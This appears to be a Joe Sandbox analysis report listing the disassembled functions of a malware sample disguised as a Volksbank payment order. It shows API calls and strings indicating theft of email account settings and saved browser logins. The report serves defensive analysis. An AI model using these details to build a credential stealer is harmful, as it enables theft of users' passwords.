                                                                                                                                                                                                                                          • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                                                                          Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                                          • API String ID: 1714764973-479759155
                                                                                                                                                                                                                                          • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                                                                                          • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                                                                          Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                                          • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                                          • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                                          • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                          • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                                          Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                                                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                                          • API String ID: 2814039832-2206097438
                                                                                                                                                                                                                                          • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                                                                                          • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                                                                          Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                                                                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                                            • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                                          • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                                          • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                                          Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                                          • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                                          • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                                          Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,?,?,7611E430,?,00000000), ref: 00402533
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                                          • API String ID: 168965057-606283353
                                                                                                                                                                                                                                          • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                                          Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                                            • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,7611E430,?,00000000), ref: 004028A3
                                                                                                                                                                                                                                            • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7611E430,?,00000000), ref: 0040297B
                                                                                                                                                                                                                                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                                          • API String ID: 1497257669-167382505
                                                                                                                                                                                                                                          • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                          • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                                                                          Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                                          • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                                          • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                          • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                                          Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2998058495-0
